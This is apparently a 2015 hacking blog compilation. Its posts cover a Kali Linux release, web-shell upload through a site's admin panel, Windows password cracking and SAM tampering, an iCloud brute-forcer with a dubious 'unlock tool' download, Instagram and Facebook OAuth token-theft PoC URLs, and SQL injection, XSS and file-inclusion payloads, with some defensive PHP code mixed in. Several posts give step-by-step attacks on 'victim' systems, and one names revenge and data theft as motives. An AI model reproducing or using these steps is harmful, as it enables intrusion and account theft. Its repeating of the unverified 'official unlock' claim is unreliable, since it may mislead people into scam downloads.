Friday, 14 August 2015

New Kali Linux 2.0 Released With Better Penetration Testing



Our Next Generation Penetration Testing Platform


Offensive Security, the creators of the Swiss army knife for security researchers, penetration testers and hackers, have finally released the much-awaited and most powerful version of Kali Linux: Kali Linux 2.0.

Kali Linux 2.0 (codename ‘Kali Sana’) is an open-source penetration testing platform that brings hundreds of penetration testing, forensics, hacking and reverse engineering tools together into a Debian-based Linux distribution.

Kali Linux 2.0 offers a redesigned user interface for a streamlined work experience, along with new multi-level menus and tool category options.
Kali Linux 2.0 is now a rolling distribution, which means users will receive tool and core system updates frequently.

Kali Linux 2.0 Features:


  1. Runs on Linux kernel 4.0,
  2. uses the full GNOME 3 desktop instead of gnome-fallback,
  3. improved hardware and wireless driver coverage,
  4. support for a variety of desktop environments,
  5. updated desktop environment and tools,
  6. features new cutting-edge wireless penetration tools,
  7. adds desktop notifications, so that you do not miss anything,
  8. supports Ruby 2.0, which makes Metasploit load much faster,
  9. adds a built-in screencasting tool so that you can record the desktop.
  10. Sadly, the Kali team has removed the Metasploit Community and Pro packages. Instead, it now offers just the open-source metasploit-framework package pre-installed.

Video Teaser

https://vimeo.com/132329259


Upgrade to Kali 2.0


Kali Linux users can upgrade from Kali 1.x to Kali 2.0 without reinstalling the whole operating system from scratch. To do this, edit your sources.list entries and run a dist-upgrade as shown below.

cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot

Download Kali 2.0 Penetration Testing Platform

Kali Linux 2.0 is available to download in the following flavors:
  • Kali Linux 64 bit
  • Kali Linux 32 bit
  • Kali Linux VMWare or VirtualBox images
  • Kali 2.0 for ARM architecture

You can also download VM images from the official website, either from a direct download link or using torrents.



Monday, 27 July 2015

How to Upload shell from admin panel

Steps To Do.

1. Access to admin panel of website.
2. A shell(You can download it from google).
3. Mozilla Firefox browser.
4. Live http headers(You can download it from google)



1. First log in to the admin panel of the website and then try to find a place where we can upload a file such as an image, PDF or DOC. In my case I found a gallery in my victim website where I can upload images.
2. Now we are going to upload a shell, but we have to rename our shell to 'shell.php.jpg' because we are uploading it as an image.
3. Before uploading 'shell.php.jpg', open Live HTTP Headers and minimize it, then click on the upload button. Like I did in the following image.

4. Now we have uploaded 'shell.php.jpg'. After that, maximize Live HTTP Headers and find 'shell.php.jpg' in the HTTP headers box, like I did in the image given below.

5. Now click on the line in which 'shell.php.jpg' is written and then click Replay.
6. After clicking on Replay, a new window will open. In the second box find 'shell.php.jpg', rename it to 'shell.php' and then press Replay again. Like I did in the image given below.

7. Now we have successfully uploaded our shell. Right-click on our second image and then click on Copy Image Location to get our shell link. Like I did in the image given below.



Note: For educational purposes only.
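
The steps above work only when the server keeps the file name sent in the request, which the client controls. The upload handler below is an added example, not code from the original post: it picks the stored name and extension itself from the detected image type. The function name `store_upload`, the size limit, the temp directory and the sample inputs are assumptions constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example (hypothetical helper): store an uploaded image safely.
// In a real handler $clientName and $bytes come from $_FILES; here they are
// passed in directly so the script runs offline.

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024; // assumed limit: 2 MiB

function store_upload(string $clientName, string $bytes, string $dir): ?string
{
    // Detected image type => extension the server is willing to write.
    $allowed = [
        IMAGETYPE_GIF  => 'gif',
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
    ];
    if ($bytes === '' || strlen($bytes) > MAX_UPLOAD_BYTES) {
        return null;
    }
    // Decide the type from the content, never from $clientName or the
    // Content-Type header: both are request fields the client can change.
    $info = @getimagesizefromstring($bytes);
    if ($info === false || !array_key_exists($info[2], $allowed)) {
        return null;
    }
    // The stored name is generated server-side, so a request replayed with
    // filename="shell.php" still ends up as <random>.gif/.jpg/.png.
    $stored = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    // $dir should live outside the web root, or be served with script
    // execution disabled.
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return null;
    }
    if (file_put_contents($dir . '/' . $stored, $bytes, LOCK_EX) === false) {
        return null;
    }
    return $stored;
}

// Constructed sample inputs: a 1x1 GIF and a text blob that is not an image.
$gif  = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
$text = 'plain text pretending to be a picture';
$dir  = sys_get_temp_dir() . '/upload_demo';

$cases = [
    ['photo.gif',     $gif],   // honest upload
    ['shell.php',     $gif],   // name changed in a replayed request
    ['shell.php.jpg', $text],  // double extension, content is not an image
];
foreach ($cases as [$name, $bytes]) {
    $stored = store_upload($name, $bytes, $dir);
    printf("%-14s => %s\n", $name, $stored ?? 'rejected');
}
```

Content detection alone is not the control here; the server-chosen name and extension are, together with an upload directory that never executes scripts.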

Tuesday, 14 July 2015

More than 1,400 Financial institutions in 88 Countries targeted by Banking Trojan in 2013


More than 1400 Financial institutions targeted by Banking Trojan in 2013

As the year draws to a close, we have seen a number of emerging threats: advanced phishing attacks from the Syrian Electronic Army, financial malware and exploit kits, Cryptolocker ransomware infections, massive Bitcoin theft, extensive privacy breaches by the NSA and many more. Financial malware was the most popular threat this year. Money is always a perfect motivation for attackers and cyber criminals, who are continually targeting financial institutions.

On Tuesday, antivirus firm Symantec released a threat report called “The State of Financial Trojans: 2013”, which revealed that over 1,400 financial institutions have been targeted and millions of computers compromised around the globe; the most targeted banks are in the US, with 71.5% of all analyzed Trojans.

Financial institutions have been fighting against malware for the last ten years to protect their customers and online transactions from threats. Over time the attackers adapted to these countermeasures, and sophisticated banking Trojans began to emerge. According to the report, the number of infections of the most common financial Trojans grew to 337 percent in the first nine months of 2013. Nearly 1,500 institutions in 88 countries were potential targets during 2013.

The financial fraud marketplace is also increasingly organized, and cyber criminals are using advanced Trojans to commit large-scale attacks. Attackers of all skill levels can enter the arena of financial fraud, as the underground marketplace is a service industry that provides an abundance of resources. Those who lack expertise can simply purchase what they need. For as little as $100, an attacker can avail of a leaked Zeus or Spyeye equipped with Web-injects. The modern financial Trojan is extremely flexible, supporting a range of functionality designed to facilitate fraudulent transactions across a variety of services.

Two dominant attack strategies are:

Focused attack: This approach suits attackers with limited resources but also scales well to larger operations. If the distribution is accurate and the target institution has a sizeable client base, a focused attack can provide an adequate supply of targets. Shylock, Bebloh and Tilon all use this approach exclusively.

Broad strokes: In this attack strategy, Trojans are set to target large numbers of institutions. Tilon, Cridex, and Gameover adopt these tactics, and Zeus also uses this approach in its default configuration.

According to Symantec, the main reason for the surge is weak authentication practices: Unfortunately, in many situations, security implementations adopted by financial institutions are inadequate to defend against the modern financial Trojan. Institutions are starting to adopt strong security measures like chipTAN, but the adoption rate is slow. Institutions that persist with weaker security measures will continue to be exploited by attackers. They need to maintain constant vigilance, apply software updates, maintain an awareness of new threats and deploy complementary security solutions that can defend against evolving malware attack

Hacking For Beginners Book


While using this book and reading various hacking tutorials, you agree to follow the below mentioned terms and conditions:

1. All the information provided in this book is for educational purposes only. The book author is no way responsible for any misuse of the information.

2. 'Hacking for Beginners' is just a term that represents the name of the book and is not a book that provides any illegal information. 'Hacking for Beginners' is a book related to Computer Security and not a book that promotes hacking/cracking/software piracy.

3. This book is totally meant for providing information on 'Computer Security', 'Computer Programming' and other related topics and is no way related towards the terms 'CRACKING' or 'HACKING' (Unethical).

4. A few articles (tutorials) in this book may contain information related to 'Hacking Passwords' or 'Hacking Email Accounts' (or similar terms). These are not the GUIDES of Hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorized access. However you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal.

5. The virus creation section in this book provides demonstration on coding simple viruses using high level programming languages. These viruses are simple ones and cause no serious damage to the computer. However we strongly insist that these information shall only be used to expand programming knowledge and not for causing malicious attacks.

6. All the information in this book is meant for developing Hacker Defense attitude among the readers and help preventing the hack attacks. 'Hacking for Beginners' insists that this information shall not be used for causing any kind of damage directly or indirectly. However you may try these codes on your own computer at your own risk.

7. The word "Hack" or "Hacking" that is used in this book shall be regarded as "Ethical Hack" or "Ethical Hacking" respectively.

8. We believe only in White Hat Hacking. On the other hand we condemn Black Hat Hacking.

9. Most of the information provided in this book are simple computer tricks (may be called by the name hacks) and are no way related to the term hacking.

10. Some of the tricks provided by us may no longer work due to fixture in the bugs that enabled the exploits. We are not responsible for any direct or indirect damage caused due to the usage of the hacks provided in the book.

The Hacker’s Underground Handbook


Learn What it Takes to Crack Even the Most Secure Systems.
Liability Disclaimer

The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word "Hack" or "Hacking" in this eBook should be regarded as "Ethical Hack" or "Ethical Hacking" respectively. You implement the information given at your own risk.

Hacker’s Challenge Test Your Incident Response Skills Using 20 Scenarios




HACKERS CHALLENGE:TEST YOUR INCIDENT RESPONSE SKILLS USING 20 SCENARIOS


"Hackers Challenge will definitely challenge even the most technically astute I.T.
security pros with its ripped from the headlines' incident response scenarios. These
based-on-real-life vignettes from a diverse field of experienced contributors make for
page-turning drama, and the reams of authentic log data will test the analytical skills
of anyone sharp enough to get to the bottom of these puzzling tableaus."

Saturday, 20 June 2015

How to Hack Windows admin password


Today, I am going to show you many aspects of Windows password storage: the storage path, the method of encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:

1) Sometimes we have forgotten our old password and the hint isn't helping.
2) We want to break into someone's computer to get information.
3) Just want to take revenge on someone.
4) Stealing computer data.

Let's take a deep dive into cracking Windows passwords, and also where they are stored and in which format.

SAM file and Password Hashes ~ the place where these passwords are stored as hashes:

Password Hashes - When you type your password into a Windows NT, 2000, XP, Vista or Windows 7 login, Windows encrypts your password using a specific encryption scheme that turns your password into something that looks like this:
                    7524248b4d2c9a9eadd3b435c51404eddc5

This is a password hash. This is what is actually checked when you type your password in: Windows encrypts what you typed and compares it against what is stored in the registry and/or SAM file.

You can break this hash password from
SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.

Location of SAM/Hashes:

You can find what you're looking for in several locations on a given machine.
It can be found on the hard drive in the folder %systemroot%\system32\config (i.e. C:\windows\system32\config). However, this folder is locked to all accounts, including Administrator, while the machine is running. The only account that can access the SAM file during operation is the "System" account.

The second location of the SAM or corresponding hashes is the registry, under HKEY_LOCAL_MACHINE\SAM. This is also locked to all users, including Administrator, while the machine is in use. (Go to Run, type regedit and hit Enter, then scroll to HKEY_LOCAL_MACHINE\SAM; however, you may not have access to it.)

So the two locations of the SAM/hashes (there are some others too) are:

- %systemroot%\system32\config

- In the registry under HKEY_LOCAL_MACHINE\SAM
Cracking or Breaking Into Admin Account:
How to get hashes from the SAM file?

Well, below are the methods to do so:
1) The easiest way to do this is to boot your target machine to an alternate OS like NTFSDOS or Linux and just copy the SAM from the %systemroot%\system32\config folder. It's quick, it's easy, and it's effective. You can get a copy of NTFSDOS from Sysinternals (http://www.sysinternals.com). The regular version of NTFSDOS is freeware, which is always nice, but only allows read-only access. This should be fine for what you want to do. However, if you're the kind of person who just has to have total control and has some money to burn, NTFSDOS Pro, which is also by Sysinternals, has read/write access, but it'll cost you $299.

2) You can also get password hashes by using pwdump2 (Google it to get the software ~ search at openwall.com). pwdump uses DLL injection in order to use the System account to view and get the password hashes stored in the registry. It then stores them in a handy little text file that you can paste into a password cracking utility like l0phtcrack or John the Ripper (Linux-based, works well); Cain and Abel can also be used.

3) Import hashes directly from l0phtcrack, and let them open to you by cracking.


Obtained hashes? Now crack them:
Well, as I have said, these can't be reversed, but well-known automated cracking software can be used to achieve the target. Yes, it is possible; all we need is a bit of patience. The software will use a lot of strings and compare them against these hashes; in short, it will decode them.

1) John the Ripper - John the Ripper is, to many, the old standby password cracker. It is command-line, which makes it nice if you're doing some scripting, and best of all it's free and open source. The only real thing that JtR is lacking is the ability to launch brute-force attacks against your password file. But look at it this way: even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.

2) L0phtCrack - Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a price tag of $249 for a single-user license, it sure seems like everyone owns it. This is probably the nicest password cracker you will ever see. It can import hashes directly from the registry and pwdump, and has dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time.

Making Your Own Password in Windows:

Injecting Password Hashes into the SAM:
One of the easiest ways to gain Administrator privileges on a machine is by injecting your own password hashes into the SAM file. In order to do this you will need physical access to the machine and a brain larger than a peanut. Using a utility called "chntpw" by Petter Nordahl-Hagen you can inject whatever password you wish into the SAM file of any NT, 2000, or XP machine, thereby giving you total control; just burn the .iso to a disk and use it. I would give a tip: back up the SAM file first by using an alternate OS. A Linux USB disk or a Windows live disk can also work. Go in, inject the password of your choosing. Log in using your new password. Do what you need to do. Then restore the original SAM so that no one will know that it was hacked.

You need to have admin access to perform this change from the command line. This is an especially handy trick if you want to change a password on an account but you’ve forgotten the original (going through the Control Panel can require confirmation of the old password).

Now we hack the admin password. To verify the user name, simply type net user to get a list of all the user names on that Windows machine. Now, go to the command prompt and enter:

cd\
cd windows\system32
net user
If there are people near you and you don’t want them to see the password you type, enter:
net user username *

E.g.
> net user username *
> Type a password for the user:
> Confirm the password:




Another easy method: using Ophcrack to hack into the admin account:

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

This is a type of offline cracking. Just grab the .iso of Ophcrack from here, burn it and enjoy using it.

1. Ophcrack can crack passwords for Windows 7, Windows Vista, and Windows XP.

2. Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any 14-character or smaller password that uses any combination of numbers, small letters, and capital letters should be crackable.

3. Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used in Windows 7 and Vista.

4. The Ophcrack LiveCD option allows for completely automatic password recovery.

5. The LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.

6. No Windows passwords need to be known to use the Ophcrack LiveCD to crack your Windows passwords.

I think this Ophcrack method is far better. Try it: just get a disk and write the image to it; a USB disk can also be used.

Some security tips ~ making strong passwords:

Now that you know how passwords can be cracked, here are some tips for you.

1) Do not use common passwords like 123456 or your own name.

2) Use @, *, # or other symbols in your passwords to ensure maximum security; in this case John the Ripper, Ophcrack and other cracking tools may take a long time, which will be frustrating for a hacker.

3) Keep changing your password, so that if one hash takes a long time to decode, you will have generated another hash by the time it is decoded.


How to Bypass iCloud Activation Lock



iCloud Apple iD BruteForcer 

This tool was released by "Pr0x13" on GitHub. It allows attackers to break into any iCloud account, potentially giving them free access to victims’ iOS devices.

How to Install: 
Put in HtDocs Folder in your Xampp installation.
Install cUrl for your OS
Navigate to http://127.0.0.1/iDict/ in your web browser (preferably Firefox, Chrome, or Safari).

Wordlist.txt is from iBrute and it satisfies iCloud password requirements.
It's been reported that if the iCloud server responds with an error, restart XAMPP or your computer.

-=Reports coming in that Server is now Patched with Rate Limiter=-
-=Server Fully Patched, Discontinue use if you don't want to lock your account!!=-

What is this?
A 100% Working iCloud Apple ID Dictionary attack that bypasses Account Lockout restrictions and Secondary Authentication on any account.

What this isn't:
A bypass or fully automated removal

Why?
This bug is painfully obvious and was only a matter of time before it was privately used for malicious or nefarious activities, I publicly disclosed it so Apple will patch it.


Credit: @Pr0x13

How to Unlock iCloud Activation Lock

First you need to download the hack tool to your PC. Click the Download button below to get this software. We give it away for free; there is no need to pay.

Unlock iCloud Lock Download BypassTool


Step 1. Download and unzip the file on your PC.
Step 2. Start the hack tool on your PC. Connect your iPhone via USB cable.
Step 3. Then click on the Start button to begin the iCloud lock bypass service.
Step 4. Wait five minutes for the process to complete. When it is done, click OK.

The final step, when this is complete, is to install the latest version of iTunes on your PC. Then do a Restore/Update on your device and the iCloud lock will be permanently removed from your Apple device. This is an official factory unlock of the iCloud lock directly from Apple Database Servers.

Many services around the world talk about this on the net, but be careful, many of them are scams. We give you this service for free and do not want you to give money to us. Just download the hack tool and enjoy.

Dear readers, if you would like a paid unlock of the iCloud lock on your iPhone in five minutes, go to this factory unlock iPhone company. This is a safe service that we tested. – iPhoneOfficialUnlock


Disclaimer: This post is knowledge purpose only. 
We are not responsible for any damage done whatsoever to anyones iCloud account or iDevices.

How to Hack Instagram Account


Nir Goldshlager, founder of Break Security, found a critical vulnerability in Instagram. A successful hack allows an attacker to access private photos, delete the victim's photos, edit comments and post new photos.

1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)


He reported a few issues to Instagram, including OAuth attacks, but the acquisition hadn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram. So I was waiting, waiting like a good WhiteCollar. Then Facebook Security sent me a message: they said that even though they were unable to fix these issues because the acquisition hadn’t closed yet, they would still pay out for these vulnerabilities.

So, first,  checked Instagram’s OAuth protocol:  (http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validating the redirect_uri parameter.

In addition, redirection was only allowed to go to the owner app domain.
Thus, a hacker needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.


Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say Nir's app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Game Over.

Bug 2.

With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.


Instagram Would like to access your public profile and friend list

Nir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user.

With the access_token the attacker will be able to post on the victim's behalf in his Facebook account and access his private friends list.

PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token
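
Both bugs above come down to how the authorization server compares redirect_uri with the registered value: a loose host comparison in Bug 1, no effective comparison in Bug 2. The following is an added example, not code from Instagram, Facebook or the original post; the weak check is an assumed model of how a suffix bypass can arise, the function names are hypothetical, and the candidate URIs are constructed from the cases listed in the post.

```php
<?php
declare(strict_types=1);

// Added example (hypothetical helpers): validating an OAuth redirect_uri.

/** Weak (assumed bug class): the host only has to START with the registered host. */
function weak_host_prefix_check(string $registered, string $candidate): bool
{
    $want = parse_url($registered);
    $got  = parse_url($candidate);
    if (!is_array($want) || !is_array($got) || !isset($want['host'], $got['host'])) {
        return false;
    }
    $hasPath = ($got['path'] ?? '') !== '';
    return !$hasPath && !isset($got['query'])
        && stripos($got['host'], $want['host']) === 0;
}

/** Canonical form of a redirect URI, or null if it is not acceptable at all. */
function canonical_redirect(string $uri): ?array
{
    // Control characters, whitespace and backslashes never belong in the value.
    if (preg_match('/[\x00-\x20\x7f\\\\]/', $uri) === 1) {
        return null;
    }
    $p = parse_url($uri);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    if (strtolower($p['scheme']) !== 'https') {
        return null;
    }
    foreach (['user', 'pass', 'query', 'fragment'] as $part) {
        if (isset($p[$part])) {
            return null;
        }
    }
    $path = $p['path'] ?? '';
    return [
        'host' => strtolower($p['host']),
        'port' => $p['port'] ?? 443,
        'path' => $path === '' ? '/' : $path,
    ];
}

/** Strict: host, port and path must all equal the registered redirect URI. */
function strict_redirect_check(string $registered, string $candidate): bool
{
    $want = canonical_redirect($registered);
    $got  = canonical_redirect($candidate);
    return $want !== null && $got !== null && $want === $got;
}

// Constructed test data based on the cases in the post.
$registered = 'https://breaksec.com';
$candidates = [
    'https://breaksec.com',            // the registered value itself
    'https://breaksec.com.mx',         // suffix trick from Bug 1
    'https://www.breaksec.com',        // subdomain
    'https://a.breaksec.com/',         // subdomain with path
    'https://breaksec.com/x/x.php',    // file on the owner domain
    'https://breaksec.com/%23,?',      // special characters
    'http://files.nirgoldshlager.com', // unrelated domain, as in Bug 2
];
foreach ($candidates as $uri) {
    printf(
        "%-34s weak=%-6s strict=%s\n",
        $uri,
        weak_host_prefix_check($registered, $uri) ? 'allow' : 'reject',
        strict_redirect_check($registered, $uri) ? 'allow' : 'reject'
    );
}
```

Only the registered value passes the strict check; the weak check also allows `https://breaksec.com.mx`.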

Source: Breaksec

How Can We Block Common Web Attacks And Protect Our Website.

A: SQL Injection
      Login Form Bypassing
      UNION SQL Injection

B: Cross Site Scripting
      Cross Site Request Forgery

C: File Inclusion
      Remote File Inclusion and Remote Code Execution

In this post I describe five types of common web attacks, which are used in most defacements and database dumps. The five exploits listed above are SQL injection, XSS, RCE, RFI, and LFI. Most of the time, we miss something in the website code; because of this, the website becomes vulnerable and allows a hacker to attack it.

A: SQL Injection

--> LOGIN FORM BYPASSING

Here is an example of the vulnerable code that we can bypass very easily:

index.html file:
<form action="login.php" method="POST">
<p>Password: <input type="text" name="pass" /><br />
<input type="submit" value="Authenticate" /></p>
</form>

login.php file:
<?php
// EXAMPLE CODE (deliberately vulnerable): user input is pasted straight into the query
$execute = "SELECT * from database WHERE password = '{$_POST['pass']}'";
$result = mysql_query($execute);
?>


We can simply bypass this by using ' or '1=1', which will execute "password = ''or '1=1'';".

Alternatively, the user can also delete the database by executing "' drop table database; --".

PREVENTION:

Use mysql_real_escape_string in your PHP code.

Example:

<?php
// Needs an open connection from the legacy mysql extension (removed in PHP 7).
$badword = "' OR 1 '";
$badword = mysql_real_escape_string($badword); // escapes the quotes in the input
$message = "SELECT * from database WHERE password = '$badword'";
echo "Blocked " . $message;
?>


--> UNION SQL Injection

UNION SQL injection is when the user uses the UNION command. The user checks for the vulnerability by
adding a tick to the end of a ".php?id=" file. If it comes back with a MySQL error, the site is most likely
vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use
the UNION ALL SELECT command. An example is shown below.

http://www.site.com/website.php?id=1'

You have an error in your SQL syntax near '' at line 1 SELECT SUM(quantity) 
as type FROM orders where (status='completed' OR status='confirmed' OR status='pending') AND user_id=1'


No error--> http://www.site.com/website.php?id=1 ORDER BY 1--  

 Two columns, and it comes back with an error! This means that there is one column.
 http://www.site.com/website.php?id=1 ORDER BY 2-- 

Selects all the columns and executes the version() command on the only column.
http://www.site.com/website.php?id=-1 UNION SELECT ALL version()-- 

SOLUTION:

Add something like below to prevent UNION SQL injection.

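// eregi_replace() was removed in PHP 7; preg_replace() with the /i flag is the equivalent.
$evil = '/(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(\/\*)|(select)/i';
$patch = preg_replace($evil, "", $patch); // $patch holds the user-supplied value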
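
Escaping and keyword stripping both still build the query text from user input. The alternative, bound parameters, is shown below as an added example that is not from the original post and covers both the login form and the id= query above. It uses PDO with an in-memory SQLite database; the users and orders tables, the name field, the stored password hash and the function names are assumptions constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example: parameterised queries with PDO. All data is constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass_hash TEXT)');
$db->exec('CREATE TABLE orders (user_id INTEGER, quantity INTEGER, status TEXT)');
$ins = $db->prepare('INSERT INTO users (id, name, pass_hash) VALUES (?, ?, ?)');
$ins->execute([1, 'admin', password_hash('correct horse', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO orders VALUES (1, 3, 'completed'), (1, 2, 'pending'), (2, 9, 'completed')");

/** Login check: the input is bound as data and never becomes SQL text. */
function login(PDO $db, string $name, string $password): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    $hash = $stmt->fetchColumn();
    // Compare against a stored hash instead of matching the password in SQL.
    return is_string($hash) && password_verify($password, $hash);
}

/** Order total for a numeric id; returns null when the id is not all digits. */
function order_total(PDO $db, string $rawId): ?int
{
    if (!ctype_digit($rawId)) {
        return null; // rejects quotes, signs, spaces and SQL keywords alike
    }
    $stmt = $db->prepare(
        "SELECT SUM(quantity) FROM orders
         WHERE status IN ('completed', 'confirmed', 'pending') AND user_id = :id"
    );
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// The inputs quoted in the post, used here as test cases.
$logins = [
    ['admin', 'correct horse'],
    ['admin', "' or '1=1"],
    ["' or '1=1", "' or '1=1"],
    ['admin', "' drop table database; --"],
];
foreach ($logins as [$name, $pass]) {
    printf("login(%s, %s) => %s\n", $name, $pass, var_export(login($db, $name, $pass), true));
}

$ids = ['1', "1'", '1 ORDER BY 2-- ', '-1 UNION SELECT ALL version()-- '];
foreach ($ids as $id) {
    printf("order_total(%s) => %s\n", $id, var_export(order_total($db, $id), true));
}
```

Only the first login and the id `1` (total 5) succeed; every other input is handled as a plain value or rejected before a query is run.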


>-------------------------------------------------------<

B: Cross Site Scripting

Cross site scripting is a type of vulnerability used by hackers to inject code into vulnerable web pages.
If a site is vulnerable to cross site scripting, most likely users will try to inject the site with malicious javascript or try to
scam users by creating a form where users have to type their information in.
 Two types of XSS (cross site scripting) are persistent XSS and non-persistent XSS.

Example:
http://www.site.com/search.php?q=">

SOLUTION
(javascript) (Thank you, Microsoft!):

function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
    return strTemp;
}

>-------------------------------------------------------<

C: File Inclusion

 Types: Remote File Inclusion/Local File Inclusion, and Remote Code Execution

Remote File Inclusion allows a hacker to include a remote file through a script (usually PHP). This code is mostly patched on websites, but some websites are still vulnerable. RFI usually leads to remote code execution or JavaScript execution.

Example of the vulnerable code:

<?php
include($_GET['page']);
?>


Exploiting it would be something like this:
http://www.site.com/page.php?page=../../../../../etc/passwd or
http://www.site.com/page.php?page=http://www.site.com/xyz.txt?

SOLUTION:

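Validate the input.
<?php
// Only pages on this allowlist may be included.
$page = isset($_GET['page']) ? $_GET['page'] : 'index.php';
$allowed = array('index.php', 'games.php', 'ip.php');
$iplogger = 'ip.php';
if (in_array($page, $allowed, true)) {
    include $page;
} else {
    // Anything else is treated as an attack attempt and logged.
    include $iplogger;
    die("IP logged.");
}
?>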


For remote code execution, the site would have to have a PHP command that executes code. You would patch this by doing about the same thing.

Note: I hope this post will help you secure your website from these types of attacks.
